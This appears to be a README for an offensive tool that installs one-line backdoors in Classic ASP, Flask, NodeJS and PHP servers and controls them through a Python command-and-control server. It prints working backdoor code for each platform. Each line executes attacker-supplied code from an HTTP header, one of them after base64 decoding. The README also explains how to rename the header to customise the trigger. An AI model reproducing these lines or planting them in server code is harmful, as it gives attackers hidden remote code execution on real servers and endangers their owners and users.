This tool allows you to deploy and exploit backdoors with one line of code in Classic ASP, Flask, NodeJS, and PHP servers.
Add the following line to the top of the file you want to have the backdoor
<% If request.servervariables("EXPLOIT") <> "" Then:execute(request.servervariables("EXPLOIT")):response.end:End If %>
Add the following line to the top of the endpoint you want to have the backdoor
if request.headers.get('EXPLOIT'): global r;exec(__import__('base64').b64decode(request.headers.get('EXPLOIT').encode()).decode());return r;
Add the following line to the top of the endpoint you want to have the backdoor
isset($_SERVER["HTTP_EXPLOIT"]) and eval($_SERVER["HTTP_EXPLOIT"]);
Add the following line to the endpoint you want to have the backdoor
if (req.headers?.exploit) return (eval('let r=res;let i=req;'+req.headers?.exploit));
Replace res
with the ServerResponse
parameter name, and replace req
with the IncomingRequest
parameter name.
Any area where EXPLOIT
or exploit
is referenced can be replaced with any custom HTTP header (eg. for PHP, HTTP_EXPLOIT
-> HTTP_ANYTHINGYOUWANT
).
The C2 runs on Python. To start, run main.py
in the src
folder.
Coming soon.
This repository was inspired by PHPSPLOIT.